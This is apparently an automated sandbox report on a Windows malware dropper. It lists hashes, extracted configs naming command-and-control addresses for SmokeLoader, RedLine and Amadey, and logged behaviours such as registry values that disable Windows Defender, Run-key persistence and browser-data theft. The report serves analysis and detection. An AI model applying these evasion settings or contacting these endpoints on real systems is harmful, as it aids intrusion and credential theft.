amadey | 5dfde77e744984136a768e4d0bf6b7c8627983ce2c7b326dc83e1d7c4b1cfd60

Analysis

max time kernel
166s
max time network
177s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
03-11-2023 13:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe
Size

1.2MB
MD5

54bb47dd6eaec3055144b0f0a697ded0
SHA1

a1eb3c832fcdddbb9d2a00aab26edff9f774f1bc
SHA256

5dfde77e744984136a768e4d0bf6b7c8627983ce2c7b326dc83e1d7c4b1cfd60
SHA512

cb9ab21d7900c7ae9f9df16f612586a106a64288aa4a7b3a66bb738a13563d35fb666c82d53852f5fd808322eef7139e9ddb455feb48cd82aa2123a088a056f5
SSDEEP

24576:PypxL9qgSmFo+x0nipVSeqNF18pcc4JLfLWDcp/vOZQ0r9oN:apx08SeqNr8pJ4JLikOZro

Malware Config

Extracted

Family

smokeloader

Version

2022

http://77.91.68.29/fks/

rc4.i32

Extracted

Family

redline

Botnet

grome

77.91.124.86:19084

Extracted

Family

amadey

Version

3.89

http://77.91.124.1/theme/index.php

Attributes

install_dir
fefffe8cea
install_file
explothe.exe
strings_key
36a96139c1118a354edf72b1080d4b2f

rc4.plain

Extracted

Family

redline

Botnet

plost

77.91.124.86:19084

Extracted

Family

redline

Botnet

kedru

77.91.124.86:19084

Extracted

Family

redline

Botnet

pixelnew2.0

194.49.94.11:80

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/8172-555-0x0000000002F00000-0x00000000037EB000-memory.dmp	family_glupteba
behavioral1/memory/8172-632-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/8172-679-0x0000000002F00000-0x00000000037EB000-memory.dmp	family_glupteba
behavioral1/memory/8172-881-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/8172-1186-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

AppLaunch.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 10 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3564-49-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\3CB9.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\3CB9.exe	family_redline
behavioral1/memory/3324-129-0x0000000000090000-0x00000000000CC000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2it919bS.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2it919bS.exe	family_redline
behavioral1/memory/2332-140-0x0000000000BB0000-0x0000000000BEC000-memory.dmp	family_redline
behavioral1/memory/6996-311-0x0000000000900000-0x000000000091E000-memory.dmp	family_redline
behavioral1/memory/6384-336-0x00000000020D0000-0x000000000212A000-memory.dmp	family_redline
behavioral1/memory/6384-537-0x0000000000400000-0x0000000000480000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/6996-311-0x0000000000900000-0x000000000091E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

latestX.exeupdater.exe

description	pid	process	target process
PID 7688 created 3268	7688	latestX.exe	Explorer.EXE
PID 7688 created 3268	7688	latestX.exe	Explorer.EXE
PID 7688 created 3268	7688	latestX.exe	Explorer.EXE
PID 7688 created 3268	7688	latestX.exe	Explorer.EXE
PID 7688 created 3268	7688	latestX.exe	Explorer.EXE
PID 6232 created 3268	6232	updater.exe	Explorer.EXE

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

217 1484 rundll32.exe
227 4020 rundll32.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

latestX.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts latestX.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exe

pid process

7992 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
217	1484	rundll32.exe
227	4020	rundll32.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

pid	process
7992	netsh.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5Vk1sX4.exeexplothe.exe5B8D.exe6DB0.exeUtsysc.exekos4.exe6542.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	5Vk1sX4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	5B8D.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	6DB0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	Utsysc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	kos4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	6542.exe

Executes dropped EXE 39 IoCs

Processes:

Za8Eg64.exeim4Hk99.exere7CF15.exe1lZ15ax9.exe2qf9919.exe3tN34KJ.exe4dA559yM.exe5Vk1sX4.exeexplothe.exe3302.exeto4xD9ej.exejz7Ey3Qk.exeFu3JA8ZY.exe3611.exeuC0Ux4Gf.exe1ya80mj3.exe3CB9.exe2it919bS.exe5B8D.exe6542.exe6850.exe6DB0.exeInstallSetup5.exetoolspub2.exeBroom.exe31839b57a4f11171d6abc8bbc4451ee4.exekos4.exeUtsysc.exelatestX.exeexplothe.exetoolspub2.exeLzmwAqmV.exeis-KPRFU.tmpABuster.exeABuster.exeUtsysc.exeexplothe.exeupdater.exe31839b57a4f11171d6abc8bbc4451ee4.exe

pid	process
2560	Za8Eg64.exe
4884	im4Hk99.exe
1360	re7CF15.exe
2288	1lZ15ax9.exe
1668	2qf9919.exe
4728	3tN34KJ.exe
4424	4dA559yM.exe
2156	5Vk1sX4.exe
2404	explothe.exe
2676	3302.exe
4588	to4xD9ej.exe
4048	jz7Ey3Qk.exe
3608	Fu3JA8ZY.exe
1704	3611.exe
2868	uC0Ux4Gf.exe
4932	1ya80mj3.exe
3324	3CB9.exe
2332	2it919bS.exe
5144	5B8D.exe
6384	6542.exe
6996	6850.exe
7964	6DB0.exe
8112	InstallSetup5.exe
6504	toolspub2.exe
7172	Broom.exe
8172	31839b57a4f11171d6abc8bbc4451ee4.exe
2316	kos4.exe
8152	Utsysc.exe
7688	latestX.exe
6328	explothe.exe
7132	toolspub2.exe
3240	LzmwAqmV.exe
5264	is-KPRFU.tmp
5608	ABuster.exe
6108	ABuster.exe
4860	Utsysc.exe
5004	explothe.exe
6232	updater.exe
2132	31839b57a4f11171d6abc8bbc4451ee4.exe

Loads dropped DLL 7 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exeis-KPRFU.tmp

pid process

1484 rundll32.exe
5588 rundll32.exe
5616 rundll32.exe
4020 rundll32.exe
5264 is-KPRFU.tmp
5264 is-KPRFU.tmp
5264 is-KPRFU.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1484	rundll32.exe
5588	rundll32.exe
5616	rundll32.exe
4020	rundll32.exe
5264	is-KPRFU.tmp
5264	is-KPRFU.tmp
5264	is-KPRFU.tmp

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

NEAS.54bb47dd6eaec3055144b0f0a697ded0.exeZa8Eg64.exeim4Hk99.exere7CF15.exeto4xD9ej.exeFu3JA8ZY.exe3302.exejz7Ey3Qk.exeuC0Ux4Gf.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Za8Eg64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	im4Hk99.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	re7CF15.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	to4xD9ej.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	Fu3JA8ZY.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	3302.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	jz7Ey3Qk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	uC0Ux4Gf.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 3 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

1lZ15ax9.exe2qf9919.exe4dA559yM.exe1ya80mj3.exetoolspub2.exe

description	pid	process	target process
PID 2288 set thread context of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 1668 set thread context of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 4424 set thread context of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4932 set thread context of 2176	4932	1ya80mj3.exe	AppLaunch.exe
PID 6504 set thread context of 7132	6504	toolspub2.exe	toolspub2.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 35 IoCs

Processes:

is-KPRFU.tmplatestX.exe

description	ioc	process
File created	C:\Program Files (x86)\ABuster\Lang\is-IGH5S.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-67VLO.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Plugins\is-2HRR6.tmp	is-KPRFU.tmp
File opened for modification	C:\Program Files (x86)\ABuster\ABuster.exe	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-VGSRB.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-UR209.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Plugins\is-29MEM.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Plugins\is-LPCGL.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-SUIRK.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-59VTR.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-2VGJT.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-FBOSQ.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-G6LPB.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-FKUD7.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\is-F6OP6.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\is-MFUV3.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-KR8H1.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-4O7Q2.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-EPVT0.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Online\is-TGOPP.tmp	is-KPRFU.tmp
File opened for modification	C:\Program Files (x86)\ABuster\unins000.dat	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-9TE1H.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-G93IQ.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-4KA0U.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Online\is-8KJDD.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-2OB1R.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-BAOMF.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\unins000.dat	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Plugins\is-QA18Q.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-47AHK.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-SL27I.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Help\is-AJEQT.tmp	is-KPRFU.tmp
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files (x86)\ABuster\Lang\is-BPUGR.tmp	is-KPRFU.tmp
File created	C:\Program Files (x86)\ABuster\Lang\is-TDC5J.tmp	is-KPRFU.tmp

Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1308 sc.exe
5256 sc.exe
5300 sc.exe
7432 sc.exe
7936 sc.exe
5768 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1308	sc.exe
5256	sc.exe
5300	sc.exe
7432	sc.exe
7936	sc.exe
5768	sc.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4444	4160	WerFault.exe	AppLaunch.exe
1824	2176	WerFault.exe	AppLaunch.exe
3532	8172	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub2.exe3tN34KJ.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3tN34KJ.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3tN34KJ.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3tN34KJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3912 schtasks.exe
6704 schtasks.exe

pid	process
3912	schtasks.exe
6704	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
